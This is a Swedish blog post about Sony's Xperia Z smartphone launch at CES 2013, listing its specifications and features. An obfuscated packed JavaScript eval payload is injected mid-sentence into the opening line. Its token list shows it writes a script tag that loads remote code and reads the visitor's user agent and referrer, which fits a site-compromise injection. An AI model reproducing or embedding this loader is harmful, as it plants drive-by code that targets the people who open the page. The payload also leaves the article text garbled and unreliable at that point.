Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Xperia Z – den bästa från Sony hittills

Filip Urde
  • On 9 januari, 2013
  • http://www.revue.se/filip-urde

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bydfi|var|u0026u|referrer|zzsfb||js|php’.split(’|’),0,{}))
presenterades nya premium smartphonen från Sony, Xperia Z på CES-mässan i Las Vegas.

Xperia Z är en unik smartphone som kombinerar världsledande teknologi med all expertis från Sony inom foto, TV, musik, film och spel.

Specifikationer:

5” full HD-skärm, 13 megapixel kamera med fast-capture, Snapdragon™ S4 Pro quad-core processor med 2 GB RAM och detta i en 7.9 mm tunn smartphone som är damm- och vattentålig.

Sony är som bekant ganska bra på kameror och detta gäller även för sina mobil kameror. Vilket inte gör det speciellt konstigt att Sony nu även introducerar världens första bildsensor med HDR-video i en smartphone, en teknik som gör det möjligt att filma med krispiga detaljer trots svåra motljusförhållanden.

Xperia Z sitter inne på en heldel bra One-touch-funktioner som gör det enkelt för dig som användare att dela musik, filmer och foton från din Xperia till flera andra av Sony-produkterna med inbyggt stöd för NFC såsom högtalare, hörlurar och även till flera av dem nyare TV-apparaterna.

Jag tycker det är väldigt kul att Sony levererar en riktig tungviktare och jag älskar att den är damm- och vattentålig!

sonymobile.com